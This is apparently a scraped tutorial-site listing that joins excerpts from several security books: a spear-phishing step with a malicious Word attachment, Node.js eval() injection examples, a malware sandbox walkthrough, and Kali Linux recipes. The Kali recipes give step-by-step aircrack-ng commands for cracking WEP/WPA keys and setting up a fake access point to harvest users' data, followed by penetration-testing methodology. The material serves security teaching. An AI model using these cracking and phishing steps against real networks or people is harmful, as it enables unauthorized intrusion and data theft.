[yes|no]:y Setting up your own server cannot be very reliable, as most of the mail services follow a reverse lookup to make sure that the e-mail has generated from the same domain name as the address name. Let's analyze another attack vector of spear-fishing. Creating a file format payload is another attack vector in which we can generate a file format with a known vulnerability and send it via e-mail to attack our target. It is preferred to use MS Word-based vulnerabilities, as they are difficult to detect whether they are malicious or not, so they can be sent as an attachment via an e-mail: set:phishing> Setup a listener [yes|no]:y [-] *** [-] * WARNING: Database support has been disabled [-] *** At last, we will be prompted on whether we want to set up a listener or not. The Metasploit listener will begin and we will wait for the user to open the malicious file and connect back to the attacking system. The success of e-mail attacks depends on the e-mail client that we are targeting. So, a proper analysis of this attack vector is essential. How it works... As discussed earlier, the spear-phishing attack vector is a social engineering attack vector that targets specific users. An e-mail is sent from the attacking machine to the target user(s). The e-mail will contain a malicious attachment, which will exploit a known vulnerability on the target machine and provide a shell connectivity to the attacker. The SET automates the entire process. The major role that social engineering plays here is setting up a scenario that looks completely legitimate to the target, fooling the target into downloading the malicious file and executing it.
Read more
  • 0
  • 0
  • 7247
article-image-general-considerations
Packt
25 Oct 2013
9 min read
Save for later

General Considerations

Packt
25 Oct 2013
9 min read
(For more resources related to this topic, see here.) Building secure Node.js applications will require an understanding of the many different layers that it is built upon. Starting from the bottom, we have the language specification that defines what JavaScript consists of. Next, the virtual machine executes your code and may have differences from the specification. Following that, the Node.js platform and its API have details in their operation that affect your applications. Lastly, third-party modules interact with our own code and need to be audited for secure programming practices. First, JavaScript's official name is ECMAScript. The international European Computer Manufacturers Association (ECMA) first standardized the language as ECMAScript in 1997. This ECMA-262 specification defines what comprises JavaScript as a language, including its features, and even some of its bugs. Even some of its general quirkiness has remained unchanged in the specification to maintain backward compatibility. While I won't say the specification itself is required reading, I will say that it is worth considering. Second, Node.js uses Google's V8 virtual machine to interpret and execute your source code. While developing for the browser, you have to consider all the other virtual machines (not to mention versions), when it comes to available features. In a Node.js application, your code only runs on the server, so you have much more freedom, and you can use all the features available to you in V8. Additionally, you can also optimize for the V8 engine exclusively. Next, Node.js handles setting up the event loop, and it takes your code to register callbacks for events and executes them accordingly. There are some important details regarding how Node.js responds to exceptions and other errors that you will need to be aware of while developing your applications. Atop Node.js is the developer API. This API is written mostly in JavaScript which allows you, as a JavaScript developer, to read it for yourself, and understand how it works. There are many provided modules that you will likely end up using, and it's important for you to know how they work, so you can code defensively. Last, but not least, the third-party modules that npm gives you access to, are in great abundance, which can be a double-edged sword. On one hand, you have many options to pick from that suit your needs. On the other hand, having a third-party code is a potential security liability, as you will be expected to support and audit each of these modules (in addition to their own dependencies) for security vulnerabilities. JavaScript security One of the biggest security risks in JavaScript itself, both on the client and now on the server, is the use of the eval() function. This function, and others like it, takes a string argument, which can represent an expression, statement, or a series of statements, and it is executed as any other JavaScript source code. This is demonstrated in the following code: // these variables are available to eval()'d code // assume these variables are user input from a POST request var a = req.body.a; // => 1 var b = req.body.b; // => 2 var sum = eval(a + "+" + b); // same as '1 + 2' This code has full access to the current scope, and can even affect the global object, giving it an alarming amount of control. Let's look at the same code, but imagine if someone malicious sent arbitrary JavaScript code instead of a simple number. The result is shown in the following code: var a = req.body.a; // => 1 var b = req.body.b; // => 2; console.log("corrupted"); var sum = eval(a + "+" + b); // same as '1 + 2; console.log("corrupted"); Due to how eval() is exploited here, we are witnessing a "remote code execution" attack! When executed directly on the server, an attacker could gain access to server files and databases. There are a few cases where eval() can be useful, but if the user input is involved in any step of the process, it should likely be avoided at all costs! There are other features of JavaScript that are functional equivalents to eval(), and should likewise be avoided unless absolutely necessary. First is the Function constructor that allows you to create a callable function from strings, as shown in the following code: // creates a function that returns the sum of 2 arguments var adder = new Function("a", "b", "return a + b"); adder(1, 2); // => 3 While very similar to the eval() function, it is not exactly the same. This is because it does not have access to the current scope. However, it does still have access to the global object, and should be avoided whenever a user input is involved. If you find yourself in a situation where there is an absolute need to execute an arbitrary code that involves user input, you do have one secure option. Node.js platform's API includes a vm module that is meant to give you the ability to compile and run code in a sandbox, preventing manipulation of the global object and even the current scope. It should be noted that the vm module has many known issues and edge cases. You should read the documentation, and understand all the implications of what you are doing to make sure you don't get caught off-guard. ES5 features ECMAScript5 included an extensive batch of changes to JavaScript, including the following changes: Strict mode for removing unsafe features from the language. Property descriptors that give you control over object and property access. Functions for changing object mutability. Strict mode Strict mode changes the way JavaScript code runs in select cases. First, it causes errors to be thrown in cases that were silent before. Second, it removes and/or change features that made optimizations for JavaScript engines either difficult or impossible. Lastly, it prohibits some syntax that is likely to show up in future versions of JavaScript. Additionally, strict mode is opt-in only, and can be applied either globally or for an individual function scope. For Node.js applications, to enable strict mode globally, add the –use_strict command line flag, while executing your program. While dealing with third-party modules that may or may not be using strict mode, this can potentially have negative side effects on your overall application. With that said, you could potentially make strict mode compliance a requirement for any audits on third-party modules. Strict mode can be enabled by adding the "use strict" pragma at the beginning of a function, before any other expressions as shown in the following code: function sayHello(name) { "use strict"; // enables strict mode for this function scope console.log("hello", name); } In Node.js, all the required files are wrapped with a function expression that handles the CommonJS module API. As a result, you can enable strict mode for an entire file, by simply putting the directive at the top of the file. This will not enable strict mode globally, as it would in an environment like the browser. Strict mode makes many changes to the syntax and runtime behavior, but for the sake of brevity we will only discuss changes relevant to application security. First, scripts run via eval() in strict mode cannot introduce new variables to the enclosing scope. This prevents leaking new and possibly conflicting variables into your code, when you run eval() as shown in the following code: "use strict"; eval("var a = true"); console.log(a); // ReferenceError thrown – a does not exist In addition, the code run via eval() is not given access to the global object through its context. This is similar, if not related, to other changes for function scope, which will be explained shortly, but this is specifically important for eval(), as it can no longer use the global object to perform additional black magic. It turns out that the eval() function is able to be overridden in JavaScript. It can be accomplished by creating a new global variable called eval, and assigning something else to it, which could be malicious. Strict mode prohibits this type of operation. It is treated more like a language keyword than a variable, and attempting to modify it will result in a syntax error as shown in the following code: // all of the examples below are syntax errors "use strict"; eval = 1; ++eval; var eval; function eval() { } Next, the function objects are more tightly secured. Some common extensions to ECMAScript add the function.caller and function.arguments references to each function, after it is invoked. Effectively, you can "walk" the call stack for a specific function by traversing these special references. This potentially exposes information that would normally appear to be out of scope. Strict mode simply makes these properties throw a TypeError remark, while attempting to read or write them, as shown in the following code: "use strict"; function restricted() { restricted.caller; // TypeError thrown restricted.arguments; // TypeError thrown } Next, arguments.callee is removed in strict mode (such as function.caller and function.arguments shown previously). Normally, arguments.callee refers to the current function, but this magic reference also exposes a way to "walk" the call stack, and possibly reveal information that previously would have been hidden or out of scope. In addition, this object makes certain optimizations difficult or impossible for JavaScript engines. Thus, it also throws a TypeError exception, when an access is attempted, as shown in the following code: "use strict"; function fun() { arguments.callee; // TypeError thrown } Lastly, functions executed with null or undefined as the context no longer coerce the global object as the context. This applies to eval() as we saw earlier, but goes further to prevent arbitrary access to the global object in other function invocations, as shown in the following code: "use strict"; (function () { console.log(this); // => null }).call(null); Strict mode can help make the code far more secure than before, but ECMAScript 5 also includes access control through the property descriptor APIs. A JavaScript engine has always had the capability to define property access, but ES5 includes these APIs to give that same power to application developers. Summary In this article, we examined the security features that applied generally to the language of JavaScript itself, including how to use static code analysis to check for many of the aforementioned pitfalls. Also, we looked at some of the inner workings of a Node.js application, and how it differs from typical browser development, when it comes to security. Resources for Article: Further resources on this subject: Setting up Node [Article] So, what is Node.js? [Article] Learning to add dependencies [Article]
Read more
  • 0
  • 0
  • 1071

article-image-submitting-malware-word-document
Packt
18 Oct 2013
5 min read
Save for later

Submitting a malware Word document

Packt
18 Oct 2013
5 min read
(For more resources related to this topic, see here.) We will submit a document dealing with Iran's Oil and Nuclear Situation. Perform the following steps: Open a new tab in the terminal and type the following command: $ python utils/submit.py --platform windows –package doc shares/Iran's Oil and Nuclear Situation.doc In this case, the document is located inside the shares folder. You have to change the location based on where your document is. Please make sure you get a Success message like the preceding screenshot with task with ID 7 (it is the ID that depends on how many times you tried to submit a malware). Cuckoo will then start the latest snapshot of the virtual machine we've made. Windows will open the Word document. A warning pop-up window will appear as shown in the preceding screenshot. We assume that the users will not be aware of what that warning is, so we will choose I recognize this content. Allow it to play. option and click on the Continue button. Wait a moment until the malware document takes some action. The VM will close automatically after all the actions are finished by the malware document. Now, you will see the Cuckoo status—on the terminal tab where we started Cuckoo—as shown in the following screenshot: We have now finished the submission process. Let's look at the subfolder of cuckoo, in the storage/analyses/ path. There are some numbered folders in storage/analyses, which represent the analysis task inside the database. These folders are based on the task ID we have created before. So, do not be confused when you find folders other than 7. Just find the folder your were searching for based on the task ID. When you see the reporting folder, you will know that Cuckoo Sandbox will make several files in a dedicated directory. Following is an example of an analysis directory structure: |-- analysis.conf|-- analysis.log|-- binary|-- dump.pcap|-- memory.dmp|-- files| |-- 1234567890| `-- dropped.exe|-- logs| |-- 1232.raw| |-- 1540.raw| `-- 1118.raw|-- reports| |-- report.html| |-- report.json| |-- report.maec11.xml| |-- report.metadata.xml| `-- report.pickle`-- shots|-- 0001.jpg|-- 0002.jpg|-- 0003.jpg`-- 0004.jpg Let us have a look at some of them in detail: analysis.conf: This is a configuration file automatically generated by Cuckoo to instruct its analyzer with some details about the current analysis. It is generally of no interest for the end user, as it is exclusively used internally by the sandbox. analysis.log: This is a log file generated by the analyzer and it contains a trace of the analysis execution inside the guest environment. It will report the creation of processes, files, and eventual error occurred during the execution. binary: This is the binary file we have submitted before. dump.pcap: This is the network dump file generated by tcpdump or any other corresponding network sniffer. memory.dmp: In case you enabled it, this file contains the full memory dump of the analysis machine. files: This directory contains all the files the malware operated on and that Cuckoo was able to dump. logs: This directory contains all the raw logs generated by Cuckoo's process monitoring. reports: This directory contains all the reports generated by Cuckoo. shots: This directory contains all the screenshots of the guest's desktop taken during the malware execution. The contents are not always similar to what is mentioned. They depend on how Cuckoo Sandbox analyzes the malware, what is the kind of the submitted malware and its behavior. After analyzing Iran's Oil and Nuclear Situation.doc there will be four folders, namely, files, logs, reports, and shots, and three files, namely, analysis.log, binary, dump.pcap, inside the storage/analyses/7 folder. To know more about how the final result of the execution of malware inside the Guest OS is, it will be more user-friendly if we open the HTML result located inside the reports folder. There will be a file named report.html. We need to double-click it and open it on the web browser. Another option to see the content of report.html is by using this command: $ lynx report.html There are some tabs with information gathered by Cuckoo Sandbox analyzer in your browser: In the File tab from your browser , you may see some interesting information. We can see this malware has been created by injecting a Word document containing nothing but a macro virus on Wednesday, November 9th, between 03:22 – 03:24 hours. What's more interesting is that it is available in the Network tab under Hosts Involved. Under the Hosts Involved option, there is a list of IP addresses, that is, 192.168.2.101, 192.168.2.255, and 192.168.2.100, which are the Guest OS's IP, Network Broadcast's IP, and vmnet0's IP, respectively. Then, what about the public IP 208.115.230.76? This is the IP used by the malware to contact to the server, which makes the analysis more interesting. After knowing that malware try to make contact outside of the host, you must be wondering how the malware make contact with the server. Therefore, we can look at the contents of the dump.pcap file. To open the dump.pcap file, you should install a packet analyzer. In this article, we will use Wireshark packet analyzer. Please make sure that you have installed Wireshark in your host OS, and then open the dump.pcap file using Wireshark. We can see the network activities of the malware in the preceding screenshot. Summary In this article, you have learned how to submit malware samples to Cuckoo Sandbox. This article also described the example of the submission of malicious files that consist of MS Office Word. Resources for Article: Further resources on this subject: Big Data Analysis [Article] GNU Octave: Data Analysis Examples [Article] StyleCop analysis [Article]
Read more
  • 0
  • 0
  • 2374

article-image-wireless-attacks-kali-linux
Packt
11 Oct 2013
13 min read
Save for later

Wireless Attacks in Kali Linux

Packt
11 Oct 2013
13 min read
In this article, by Willie L. Pritchett, author of the Kali Linux Cookbook, we will learn about the various wireless attacks. These days, wireless networks are everywhere. With users being on the go like never before, having to remain stationary because of having to plug into an Ethernet cable to gain Internet access is not feasible. For this convenience, there is a price to be paid; wireless connections are not as secure as Ethernet connections. In this article, we will explore various methods for manipulating radio network traffic including mobile phones and wireless networks. We will cover the following topics in this article: Wireless network WEP cracking Wireless network WPA/WPA2 cracking Automating wireless network cracking Accessing clients using a fake AP URL traffic manipulation Port redirection Sniffing network traffic (For more resources related to this topic, see here.) Wireless network WEP cracking Wireless Equivalent Privacy, or WEP as it's commonly referred to, has been around since 1999 and is an older security standard that was used to secure wireless networks. In 2003, WEP was replaced by WPA and later by WPA2. Due to having more secure protocols available, WEP encryption is rarely used. As a matter of fact, it is highly recommended that you never use WEP encryption to secure your network! There are many known ways to exploit WEP encryption and we will explore one of those ways in this recipe. In this recipe, we will use the AirCrack suite to crack a WEP key. The AirCrack suite (or AirCrack NG as it's commonly referred to) is a WEP and WPA key cracking program that captures network packets, analyzes them, and uses this data to crack the WEP key. Getting ready In order to perform the tasks of this recipe, experience with the Kali terminal window is required. A supported wireless card configured for packet injection will also be required. In case of a wireless card, packet injection involves sending a packet, or injecting it onto an already established connection between two parties. Please ensure your wireless card allows for packet injection as this is not something that all wireless cards support. How to do it... Let's begin the process of using AirCrack to crack a network session secured by WEP. Open a terminal window and bring up a list of wireless network interfaces: airmon-ng Under the interface column, select one of your interfaces. In this case, we will use wlan0. If you have a different interface, such as mon0, please substitute it at every location where wlan0 is mentioned. Next, we need to stop the wlan0 interface and take it down so that we can change our MAC address in the next step. airmon-ng stop ifconfig wlan0 down Next, we need to change the MAC address of our interface. Since the MAC address of your machine identifies you on any network, changing the identity of our machine allows us to keep our true MAC address hidden. In this case, we will use 00:11:22:33:44:55. macchanger --mac 00:11:22:33:44:55 wlan0 Now we need to restart airmon-ng. airmon-ng start wlan0 Next, we will use airodump to locate the available wireless networks nearby. airodump-ng wlan0 A listing of available networks will begin to appear. Once you find the one you want to attack, press Ctrl + C to stop the search. Highlight the MAC address in the BSSID column, right click your mouse, and select copy. Also, make note of the channel that the network is transmitting its signal upon. You will find this information in the Channel column. In this case, the channel is 10. Now we run airodump and copy the information for the selected BSSID to a file. We will utilize the following options: –c allows us to select our channel. In this case, we use 10. –w allows us to select the name of our file. In this case, we have chosen wirelessattack. –bssid allows us to select our BSSID. In this case, we will paste 09:AC:90:AB:78 from the clipboard. airodump-ng –c 10 –w wirelessattack --bssid 09:AC:90:AB:78 wlan0 A new terminal window will open displaying the output from the previous command.Leave this window open. Open another terminal window; to attempt to make an association, we will run aireplay, which has the following syntax: aireplay-ng -1 0 –a [BSSID] –h [our chosen MAC address] –e [ESSID] [Interface] aireplay-ng -1 0 -a 09:AC:90:AB:78 –h 00:11:22:33:44:55 –e backtrack wlan0 Next, we send some traffic to the router so that we have some data to capture. We use aireplay again in the following format: aireplay-ng -3 –b [BSSID] – h [Our chosen MAC address] [Interface] aireplay-ng -3 –b 09:AC:90:AB:78 –h 00:11:22:33:44:55 wlan0 Your screen will begin to fill with traffic. Let this process run for a minute or two until we have information to run the crack. Finally, we run AirCrack to crack the WEP key. aircrack-ng –b 09:AC:90:AB:78 wirelessattack.cap That's it! How it works... In this recipe, we used the AirCrack suite to crack the WEP key of a wireless network. AirCrack is one of the most popular programs for cracking WEP. AirCrack works by gathering packets from a wireless connection over WEP and then mathematically analyzing the data to crack the WEP encrypted key. We began the recipe by starting AirCrack and selecting our desired interface. Next, we changed our MAC address which allowed us to change our identity on the network and then searched for available wireless networks to attack using airodump. Once we found the network we wanted to attack, we used aireplay to associate our machine with the MAC address of the wireless device we were attacking. We concluded by gathering some traffic and then brute-forced the generated CAP file in order to get the wireless password. Wireless network WPA/WPA2 cracking WiFi Protected Access, or WPA as it's commonly referred to, has been around since 2003 and was created to secure wireless networks and replace the outdated previous standard, WEP encryption. In 2003, WEP was replaced by WPA and later by WPA2. Due to having more secure protocols available, WEP encryption is rarely used. In this recipe, we will use the AirCrack suite to crack a WPA key. The AirCrack suite (or AirCrack NG as it's commonly referred) is a WEP and WPA key cracking program that captures network packets, analyzes them, and uses this data to crack the WPA key. Getting ready In order to perform the tasks of this recipe, experience with the Kali Linux terminal windows is required. A supported wireless card configured for packet injection will also be required. In the case of a wireless card, packet injection involves sending a packet, or injecting it onto an already established connection between two parties. How to do it... Let's begin the process of using AirCrack to crack a network session secured by WPA. Open a terminal window and bring up a list of wireless network interfaces. airmon-ng Under the interface column, select one of your interfaces. In this case, we will use wlan0. If you have a different interface, such as mon0, please substitute it at every location where wlan0 is mentioned. Next, we need to stop the wlan0 interface and take it down. airmon-ng stop wlan0 ifconfig wlan0 down Next, we need to change the MAC address of our interface. In this case, we will use 00:11:22:33:44:55. macchanger -–mac 00:11:22:33:44:55 wlan0 Now we need to restart airmon-ng. airmon-ng start wlan0 Next, we will use airodump to locate the available wireless networks nearby. airodump-ng wlan0 A listing of available networks will begin to appear. Once you find the one you want to attack, press Ctrl + C to stop the search. Highlight the MAC address in the BSSID column, right-click, and select copy. Also, make note of the channel that the network is transmitting its signal upon. You will find this information in the Channel column. In this case, the channel is 10. Now we run airodump and copy the information for the selected BSSID to a file. We will utilize the following options: –c allows us to select our channel. In this case, we use 10. –w allows us to select the name of our file. In this case, we have chosen wirelessattack. –bssid allows us to select our BSSID. In this case, we will paste 09:AC:90:AB:78 from the clipboard. airodump-ng –c 10 –w wirelessattack --bssid 09:AC:90:AB:78 wlan0 A new terminal window will open displaying the output from the previous command.Leave this window open. Open another terminal window; to attempt to make an association, we will run aireplay, which has the following syntax: aireplay-ng –dauth 1 –a [BSSID] –c [our chosen MAC address] [Interface]. This process may take a few moments. Aireplay-ng --deauth 1 –a 09:AC:90:AB:78 –c 00:11:22:33:44:55 wlan0 Finally, we run AirCrack to crack the WPA key. The –w option allows us to specify the location of our wordlist. We will use the .cap file that we named earlier. In this case,the file's name is wirelessattack.cap. Aircrack-ng –w ./wordlist.lst wirelessattack.cap That's it! How it works... In this recipe, we used the AirCrack suite to crack the WPA key of a wireless network. AirCrack is one of the most popular programs for cracking WPA. AirCrack works by gathering packets from a wireless connection over WPA and then brute-forcing passwords against the gathered data until a successful handshake is established. We began the recipe by starting AirCrack and selecting our desired interface. Next, we changed our MAC address which allowed us to change our identity on the network and then searched for available wireless networks to attack using airodump . Once we found the network we wanted to attack, we used aireplay to associate our machine with the MAC address of the wireless device we were attacking. We concluded by gathering some traffic and then brute forced the generated CAP file in order to get the wireless password. Automating wireless network cracking In this recipe we will use Gerix to automate a wireless network attack. Gerix is an automated GUI for AirCrack. Gerix comes installed by default on Kali Linux and will speed up your wireless network cracking efforts. Getting ready A supported wireless card configured for packet injection will be required to complete this recipe. In the case of a wireless card, packet injection involves sending a packet, or injecting it, onto an already established connection between two parties. How to do it... Let's begin the process of performing an automated wireless network crack with Gerix by downloading it. Using wget, navigate to the following website to download Gerix. wget https://bitbucket.org/Skin36/gerix-wifi-cracker-pyqt4/downloads/gerix-wifi-cracker-master.rar Once the file has been downloaded, we now need to extract the data from the RAR file. unrar x gerix-wifi-cracker-master.rar Now, to keep things consistent, let's move the Gerix folder to the /usr/share directory with the other penetration testing tools. mv gerix-wifi-cracker-master /usr/share/gerix-wifi-cracker Let's navigate to the directory where Gerix is located. cd /usr/share/gerix-wifi-cracker To begin using Gerix, we issue the following command: python gerix.py Click on the Configuration tab. On the Configuration tab, select your wireless interface. Click on the Enable/Disable Monitor Mode button. Once Monitor mode has been enabled successfully, under Select Target Network, click on the Rescan Networks button. The list of targeted networks will begin to fill. Select a wireless network to target. In this case, we select a WEP encrypted network. Click on the WEP tab. Under Functionalities, click on the Start Sniffing and Logging button. Click on the subtab WEP Attacks (No Client). Click on the Start false access point authentication on victim button. Click on the Start the ChopChop attack button. In the terminal window that opens, answer Y to the Use this packet question. Once completed, copy the .cap file generated. Click on the Create the ARP packet to be injected on the victim access point button. Click on the Inject the created packet on victim access point button. In the terminal window that opens, answer Y to the Use this packet question. Once you have gathered approximately 20,000 packets, click on the Cracking tab. Click on the Aircrack-ng – Decrypt WEP Password button. That's it! How it works... In this recipe, we used Gerix to automate a crack on a wireless network in order to obtain the WEP key. We began the recipe by launching Gerix and enabling the monitoring mode interface. Next, we selected our victim from a list of attack targets provided by Gerix. After we started sniffing the network traffic, we then used Chop Chop to generate the CAP file. We concluded the recipe by gathering 20,000 packets and brute-forced the CAP file with AirCrack. With Gerix, we were able to automate the steps to crack a WEP key without having to manually type commands in a terminal window. This is an excellent way to quickly and efficiently break into a WEP secured network. Accessing clients using a fake AP In this recipe, we will use Gerix to create and set up a fake access point (AP). Setting up a fake access point gives us the ability to gather information on each of the computers that access it. People in this day and age will often sacrifice security for convenience. Connecting to an open wireless access point to send a quick e-mail or to quickly log into a social network is rather convenient. Gerix is an automated GUI for AirCrack. Getting ready A supported wireless card configured for packet injection will be required to complete this recipe. In the case of a wireless card, packet injection involves sending a packet, or injecting it onto an already established connection between two parties. How to do it... Let's begin the process of creating a fake AP with Gerix. Let's navigate to the directory where Gerix is located: cd /usr/share/gerix-wifi-cracker To begin using Gerix, we issue the following command: python gerix.py Click on the Configuration tab. On the Configuration tab, select your wireless interface. Click on the Enable/Disable Monitor Mode button. Once Monitor mode has been enabled successfully, under Select Target Network, press the Rescan Networks button. The list of targeted networks will begin to fill. Select a wireless network to target. In this case, we select a WEP encrypted network. Click on the Fake AP tab. Change the Access Point ESSID from honeypot to something less suspicious. In this case, we are going to use personalnetwork. We will use the defaults on each of the other options. To start the fake access point,click on the Start Face Access Point button. That's it! How it works... In this recipe, we used Gerix to create a fake AP. Creating a fake AP is an excellent way of collecting information from unsuspecting users. The reason fake access points are a great tool to use is that to your victim, they appear to be a legitimate access point, thus making it trusted by the user. Using Gerix, we were able to automate the creation of setting up a fake access point in a few short clicks.
Read more
  • 0
  • 0
  • 14106
article-image-penetration-testing-and-setup
Packt
27 Sep 2013
35 min read
Save for later

Penetration Testing and Setup

Packt
27 Sep 2013
35 min read
(For more resources related to this topic, see here.) Penetration Testing goes beyond an assessment by evaluating identified vulnerabilities to verify if the vulnerability is real or a false positive. For example, an audit or an assessment may utilize scanning tools that provide a few hundred possible vulnerabilities on multiple systems. A Penetration Test would attempt to attack those vulnerabilities in the same manner as a malicious hacker to verify which vulnerabilities are genuine reducing the real list of system vulnerabilities to a handful of security weaknesses. The most effective Penetration Tests are the ones that target a very specific system with a very specific goal. Quality over quantity is the true test of a successful Penetration Test. Enumerating a single system during a targeted attack reveals more about system security and response time to handle incidents than wide spectrum attack. By carefully choosing valuable targets, a Penetration Tester can determine the entire security infrastructure and associated risk for a valuable asset. This is a common misinterpretation and should be clearly explained to all potential customers. Penetration Testing evaluates the effectiveness of existing security. If a customer does not have strong security then they will receive little value from Penetration Testing services. As a consultant, it is recommended that Penetration Testing services are offered as a means to verify security for existing systems once a customer believes they have exhausted all efforts to secure those systems and are ready to evaluate if there are any existing gaps in securing those systems. Positioning a proper scope of work is critical when selling Penetration Testing services. The scope of work defines what systems and applications are being targeted as well as what toolsets may be used to compromise vulnerabilities that are found. Best practice is working with your customer during a design session to develop an acceptable scope of work that doesn't impact the value of the results. Web Penetration Testing with Kali Linux—the next generation of BackTrack —is a hands-on guide that will provide you step-by-step methods for finding vulnerabilities and exploiting web applications. This article will cover researching targets, identifying and exploiting vulnerabilities in web applications as well as clients using web application services, defending web applications against common attacks, and building Penetration Testing deliverables for professional services practice. We believe this article is great for anyone who is interested in learning how to become a Penetration Tester, users who are new to Kali Linux and want to learn the features and differences in Kali versus BackTrack, and seasoned Penetration Testers who may need a refresher or reference on new tools and techniques. This article will break down the fundamental concepts behind various security services as well as guidelines for building a professional Penetration Testing practice. Concepts include differentiating a Penetration Test from other services, methodology overview, and targeting web applications. This article also provides a brief overview of setting up a Kali Linux testing or real environment. Web application Penetration Testing concepts A web application is any application that uses a web browser as a client. This can be a simple message board or a very complex spreadsheet. Web applications are popular based on ease of access to services and centralized management of a system used by multiple parties. Requirements for accessing a web application can follow industry web browser client standards simplifying expectations from both the service providers as well as the hosts accessing the application. Web applications are the most widely used type of applications within any organization. They are the standard for most Internet-based applications. If you look at smartphones and tablets, you will find that most applications on these devices are also web applications. This has created a new and large target-rich surface for security professionals as well as attackers exploiting those systems. Penetration Testing web applications can vary in scope since there is a vast number of system types and business use cases for web application services. The core web application tiers which are hosting servers, accessing devices, and data depository should be tested along with communication between the tiers during a web application Penetration Testing exercise. An example for developing a scope for a web application Penetration Test is testing a Linux server hosting applications for mobile devices. The scope of work at a minimum should include evaluating the Linux server (operating system, network configuration, and so on), applications hosted from the server, how systems and users authenticate, client devices accessing the server and communication between all three tiers. Additional areas of evaluation that could be included in the scope of work are how devices are obtained by employees, how devices are used outside of accessing the application, the surrounding network(s), maintenance of the systems, and the users of the systems. Some examples of why these other areas of scope matter are having the Linux server compromised by permitting connection from a mobile device infected by other means or obtaining an authorized mobile device through social media to capture confidential information. Some deliverable examples in this article offer checkbox surveys that can assist with walking a customer through possible targets for a web application Penetration Testing scope of work. Every scope of work should be customized around your customer's business objectives, expected timeframe of performance, allocated funds, and desired outcome. As stated before, templates serve as tools to enhance a design session for developing a scope of work. Penetration Testing methodology There are logical steps recommended for performing a Penetration Test. The first step is identifying the project's starting status. The most common terminology defining the starting state is Black box testing, White box testing, or a blend between White and Black box testing known as Gray box testing. Black box assumes the Penetration Tester has no prior knowledge of the target network, company processes, or services it provides. Starting a Black box project requires a lot of reconnaissance and, typically, is a longer engagement based on the concept that real-world attackers can spend long durations of time studying targets before launching attacks. As a security professional, we find Black box testing presents some problems when scoping a Penetration Test. Depending on the system and your familiarity with the environment, it can be difficult to estimate how long the reconnaissance phase will last. This usually presents a billing problem. Customers, in most cases, are not willing to write a blank cheque for you to spend unlimited time and resources on the reconnaissance phase; however, if you do not spend the time needed then your Penetration Test is over before it began. It is also unrealistic because a motivated attacker will not necessarily have the same scoping and billing restrictions as a professional Penetration Tester. That is why we recommend Gray box over Black box testing. White box is when a Penetration Tester has intimate knowledge about the system. The goals of the Penetration Test are clearly defined and the outcome of the report from the test is usually expected. The tester has been provided with details on the target such as network information, type of systems, company processes, and services. White box testing typically is focused on a particular business objective such as meeting a compliance need, rather than generic assessment, and could be a shorter engagement depending on how the target space is limited. White box assignments could reduce information gathering efforts, such as reconnaissance services, equaling less cost for Penetration Testing services. Gray box testing falls in between Black and White box testing. It is when the client or system owner agrees that some unknown information will eventually be discovered during a Reconnaissance phase, but allows the Penetration Tester to skip this part. The Penetration Tester is provided some basic details of the target; however, internal workings and some other privileged information is still kept from the Penetration Tester. Real attackers tend to have some information about a target prior to engaging the target. Most attackers (with the exception of script kiddies or individuals downloading tools and running them) do not choose random targets. They are motivated and have usually interacted in some way with their target before attempting an attack. Gray box is an attractive choice approach for many security professionals conducting Penetration Tests because it mimics real-world approaches used by attackers and focuses on vulnerabilities rather than reconnaissance. The scope of work defines how penetration services will be started and executed. Kicking off a Penetration Testing service engagement should include an information gathering session used to document the target environment and define the boundaries of the assignment to avoid unnecessary reconnaissance services or attacking systems that are out of scope. A well-defined scope of work will save a service provider from scope creep (defined as uncontrolled changes or continuous growth in a project's scope), operate within the expected timeframe and help provide more accurate deliverable upon concluding services. Real attackers do not have boundaries such as time, funding, ethics, or tools meaning that limiting a Penetration Testing scope may not represent a real-world scenario. In contrast to a limited scope, having an unlimited scope may never evaluate critical vulnerabilities if a Penetration Test is concluded prior to attacking desired systems. For example, a Penetration Tester may capture user credentials to critical systems and conclude with accessing those systems without testing how vulnerable those systems are to network-based attacks. It's also important to include who is aware of the Penetration Test as a part of the scope. Real attackers may strike at anytime and probably when people are least expecting it. Some fundamentals for developing a scope of work for a Penetration Test are as follows: Definition of Target System(s): This specifies what systems should be tested. This includes the location on the network, types of systems, and business use of those systems. Timeframe of Work Performed: When the testing should start and what is the timeframe provided to meet specified goals. Best practice is NOT to limit the time scope to business hours. How Targets Are Evaluated: What types of testing methods such as scanning or exploitation are and not permitted? What is the risk associated with permitted specific testing methods? What is the impact of targets that become inoperable due to penetration attempts? Examples are; using social networking by pretending to be an employee, denial of service attack on key systems, or executing scripts on vulnerable servers. Some attack methods may pose a higher risk of damaging systems than others. Tools and software: What tools and software are used during the Penetration Test? This is important and a little controversial. Many security professionals believe if they disclose their tools they will be giving away their secret sauce. We believe this is only the case when security professionals used widely available commercial products and are simply rebranding canned reports from these products. Seasoned security professionals will disclose the tools being used, and in some cases when vulnerabilities are exploited, documentation on the commands used within the tools to exploit a vulnerability. This makes the exploit re-creatable, and allows the client to truly understand how the system was compromised and the difficulty associated with the exploit. Notified Parties: Who is aware of the Penetration Test? Are they briefed beforehand and able to prepare? Is reaction to penetration efforts part of the scope being tested? If so, it may make sense not to inform the security operations team prior to the Penetration Test. This is very important when looking at web applications that may be hosted by another party such as a cloud service provider that could be impacted from your services. Initial Access Level: What type of information and access is provided prior to kicking off the Penetration Test? Does the Penetration Tester have access to the server via Internet and/or Intranet? What type of initial account level access is granted? Is this a Black, White, or Gray box assignment for each target? Definition of Target Space: This defines the specific business functions included in the Penetration Test. For example, conducting a Penetration Test on a specific web application used by sales while not touching a different application hosted from the same server. Identification of Critical Operation Areas: Define systems that should not be touched to avoid a negative impact from the Penetration Testing services. Is the active authentication server off limits? It's important to make critical assets clear prior to engaging a target. Definition of the Flag: It is important to define how far a Penetration Test should compromise a system or a process. Should data be removed from the network or should the attacker just obtain a specific level of unauthorized access? Deliverable: What type of final report is expected? What goals does the client specify to be accomplished upon closing a Penetration Testing service agreement? Make sure the goals are not open-ended to avoid scope creep of expected service. Is any of the data classified or designated for a specific group of people? How should the final report be delivered? It is important to deliver a sample report or periodic updates so that there are no surprises in the final report. Remediation expectations: Are vulnerabilities expected to be documented with possible remediation action items? Who should be notified if a system is rendered unusable during a Penetration Testing exercise? What happens if sensitive data is discovered? Most Penetration Testing services do NOT include remediation of problems found. Some service definitions that should be used to define the scope of services are: Security Audit: Evaluating a system or an application's risk level against a set of standards or baselines. Standards are mandatory rules while baselines are the minimal acceptable level of security. Standards and baselines achieve consistency in security implementations and can be specific to industries, technologies, and processes. Most requests for security serves for audits are focused on passing an official audit (for example preparing for a corporate or a government audit) or proving the baseline requirements are met for a mandatory set of regulations (for example following the 